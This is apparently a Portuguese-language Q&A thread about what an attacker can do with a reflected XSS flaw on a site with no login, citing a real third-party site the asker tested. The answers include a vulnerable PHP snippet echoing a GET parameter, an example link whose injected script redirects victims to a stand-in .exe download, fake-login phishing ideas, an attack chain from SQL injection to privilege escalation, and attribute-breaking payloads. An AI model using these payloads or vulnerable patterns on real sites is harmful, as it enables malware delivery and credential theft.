# Como danificar um site usando XSS/SQL injection?

Tags: php, javascript, sql, xss, sql-injection

Não sou nenhum tipo de hacker, mas conheço algumas técnicas. Eu estou treinando segurança e fiquei realmente pensativo em relação à questão. Toda vez que injeto um script, é um `alert()`, nada perigoso para o host (por exemplo). Não tenho site, não haveria como encaminhar cookies. Qual é o grande risco de uma falha XSS em um site sem DB/sistema de login? Tenho um site real aqui (http://www.verinha.de/commentary_english.htm) que achei mechendo na internet. Sim, é um erro potencial, porém, como o site não tem sistema de login, e não sei de nada que um black hat possa fazer. O que "hackers/crackers" de verdade fariam?

PS: para experimentar no que dava, escrevi `<script>window.location = "https://www.google.com";</script>`. Fui encaminhado para o Google e voltei à pagina. Nada aconteceu.

Comment: SQL injection em um site sem BD não existe. XSS tecnicamente existe (i.e., pode ser possível injetar scripts), mas ataques baseados nisso dependem do script ser persistido e executado por outros usuários do site.

Comment: @bfavaretto Sobre o SQL eu sei, hehe. Quero dizer, como fazer mudanças de aparencia em uma pagina, por exemplo.

Comment: Se você está falando de um site estático, você precisa de acesso ao servidor para isso.

Comment: Nos seus exemplos você me parece estar injetando apenas no seu browser, e não no site. Desta forma você não consegue atingir terceiros, e não tem como fazer um "ataque", visto que as ações sequer passaram pela rede.

Comment: PS: A não ser que você usasse isso pra atingir alguém que fosse usar o mesmo PC, muito provavelmente na mesma sessão de navegação... :)

Answer (score 10, accepted):

Não existe uma forma certa de explorar isso. Basicamente você precisa entender quem acessa o site e qual o foco dos usuários e muitas vezes não basta somente utilizar uma técnica, por exemplo:

Vamos supor que os usuários do site em questão possuam conta no Site XPTO. Você poderia criar um redirecionamento ou um iframe para uma página false do Site XPTO com um formulário e copiar estes dados. Como o usuário entrou sozinho no Site que possui o problema de XSS ele não vai achar que esta sendo enganado. Outro exemplo seria incluir um redirecionamento para um .exe com objetivos de atacar o computador do usuário. Isso é comumente visto com páginas de banco ou de carteiras virtuais.

No exemplo em questão o XSS não é [persistente](http://pt.wikipedia.org/wiki/Cross-site_scripting#N.C3.A3o_persistente%3a), ou seja ele não fica salvo dentro da página, possivelmente não existe um banco de dados.
Neste caso a técnica tem que ser adaptada, é comum passar o script por meio de GET quando o problema utiliza algum campo de formulário.

```
<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>
```

Este é um exemplo muito parecido com o site mencionado, a diferença é que as informações são passadas por meio de GET do PHP e não por meio do Prompt do JavaScript.
Neste caso bastaria enviar para os usuários um link como

`http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>`

Uma variante desta técnica foi bastante utilizada na época do [Orkut](https://productforums.google.com/forum/#!topic/orkut/TAbj1gPMgLw), a Google já utilizava o login `"Com conta Google"` por padrão, porém existia um parâmetro adicional chamado `redirect`, muitos enviavam esta url com um redirecionamento para um arquivo `.exe` ou uma `página falsa de login`. Eu sei que o problema não era relacionado com XSS porém acho valido mencionar.

No site `http://www.verinha.de` realmente existe um problema de XSS, porém ao analisar o código fonte é possível ver que o resultado não é armazenado em nenhum lugar, e que não é possível informar o valor pela url. De forma geral não existe uma aplicação neste caso, pelo menos não utilizando somente esta técnica.

Espero ter complementado em algo.

Comment: Vale lembrar tambem para tomar cuidado quando fizer sites que permitem imagens, apenas permita *upload*, pois imagens por URL são um risco em potencial, eu poderia colocar a URL da imagem como meuSite.com/deletarMinhaConta.php por exemplo, o que não seria legal.

Comment: Qual seria um ataque que realmente pudesse causar um problema em um servidor?

Comment: O mais comum é SQL Injection, sendo que este é bem comum em toda a internet. Porém é possível conseguir elevar os privilégios de administrador no servidor utilizando um simples sistema de upload ou conseguir o login e senhas de root do servidor, procure por RFI para entender melhor. Mas de forma geral um ataque segue a seguinte linha -> SQL Injection -> Acesso a área administrativa com Sistema de Upload -> Envio de arquivo infectado ao servidor -> Elevação de privilegio -> Ataque a todos os sites do servidor. Claro isso é umas das coisas mais comuns, mas cada caso é um caso diferente.

Answer (score -2):

Teria que pensar em algo assim:
Digamos que teria uma caixa de texto, para digitar alguma coisa, como nome de usuário:

```
User Name : <input ... value="Nome">
```

Agora, se digitasse assim:"onmouseover="evento

```
<input ... value=" "onmouseover="evento ">
```

Ou alguma coisa assim:
Temos uma caixa de texto, tipo de um navegador, se digitarmos tal coisa, pode aparecer "Não foi encontrado nenhum resultado para [palavra pesquisada]"
E se digitarmos: Código, e o navegador ou outro site não achar nada, se não tiver nenhuma segurança, pode executar o script.
Digamos que isso é um código HTML:

```html
<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div>
```

Exemplo 2:

```html
<script type="text/javascript">
function Pesquise(){
/*Script do navegador ou parte de pesquisa de um site*/
document.getElementById("Result").innerHTML  = "Não foi encontrado nenhum resultado para " +  document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>
```